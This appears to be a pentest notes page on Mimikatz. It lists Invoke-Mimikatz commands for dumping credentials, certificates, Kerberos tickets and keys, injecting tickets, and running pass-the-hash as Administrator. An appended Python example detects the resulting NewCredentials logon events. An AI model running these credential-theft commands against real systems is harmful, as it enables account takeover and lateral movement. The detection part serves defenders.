# Mimikatz & PassTheHash

## Mimikatz

It is the most widely used tool for extracting hashes and passwords from Windows machines, and it is available from [its repository](https://github.com/gentilkiwi/mimikatz).

Domain credentials are stored in the ntds.dit file on the Domain Controller (DC).

* Dump credentials on the local machine

{% code overflow="wrap" %}

```
Invoke-Mimikatz -DumpCreds
```

{% endcode %}

* Dump certificates on the local machine

{% code overflow="wrap" %}

```
Invoke-Mimikatz -DumpCerts
```

{% endcode %}

* Dump credentials from several remote machines

```
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
```

* Export all tickets on the machine

```
Invoke-Mimikatz -Command '"kerberos::list /export"'
```

* List the tickets of the users authenticated on the local machine

```
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
```

* List Kerberos encryption keys

```
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
```

* Inject a ticket

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
```

{% endcode %}

## Pass The Hash (PTH)

Uses a user's NTLM hash to impersonate that user. In this case it also opens a PowerShell console.

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'
```

{% endcode %}
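For the defensive side of the command above, this added example (not part of the original page or of Mimikatz) scans exported Security events for the trace `sekurlsa::pth` is known to leave on the host: event 4624 with LogonType 9 (NewCredentials) and logon process `seclogo`. The sample events, host names and users are constructed, and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Constructed sample data: hosts, users and values are made up for this example.
TEMPLATE = (
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    "<System><EventID>{eid}</EventID><Computer>{host}</Computer></System>"
    '<EventData><Data Name="SubjectUserName">{subject}</Data>'
    '<Data Name="TargetOutboundUserName">{outbound}</Data>'
    '<Data Name="LogonType">{ltype}</Data>'
    '<Data Name="LogonProcessName">{proc}</Data>'
    '<Data Name="AuthenticationPackageName">{pkg}</Data></EventData></Event>'
)
SAMPLE_EVENTS = [
    TEMPLATE.format(eid=4624, host="ws01.corp.example", subject="alice",
                    outbound="-", ltype=2, proc="User32 ", pkg="Negotiate"),
    TEMPLATE.format(eid=4624, host="ws01.corp.example", subject="alice",
                    outbound="Administrator", ltype=9, proc="seclogo", pkg="Negotiate"),
    TEMPLATE.format(eid=4624, host="srv02.corp.example", subject="-",
                    outbound="-", ltype=3, proc="NtLmSsp ", pkg="NTLM"),
]

def parse_event(xml_text):
    """Return (event_id, computer, {Data Name: value}) for one event XML string."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    computer = root.findtext("e:System/e:Computer", namespaces=NS)
    data = {d.get("Name"): (d.text or "").strip()
            for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, computer, data

def is_newcredentials_logon(event_id, data):
    """True for 4624 with LogonType 9 via seclogo/Negotiate (NewCredentials)."""
    return (event_id == 4624
            and data.get("LogonType") == "9"
            and data.get("LogonProcessName", "").lower() == "seclogo"
            and data.get("AuthenticationPackageName", "").lower() == "negotiate")

def find_pth_candidates(events):
    """Return host, subject and outbound user for each matching event."""
    hits = []
    for event_id, computer, data in map(parse_event, events):
        if is_newcredentials_logon(event_id, data):
            hits.append({"computer": computer, "subject": data.get("SubjectUserName"),
                         "outbound": data.get("TargetOutboundUserName")})
    return hits

if __name__ == "__main__":
    print(find_pth_candidates(SAMPLE_EVENTS))
```

`runas /netonly` produces the same logon pattern, so treat a hit as a triage lead and correlate it with the process that requested the logon.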

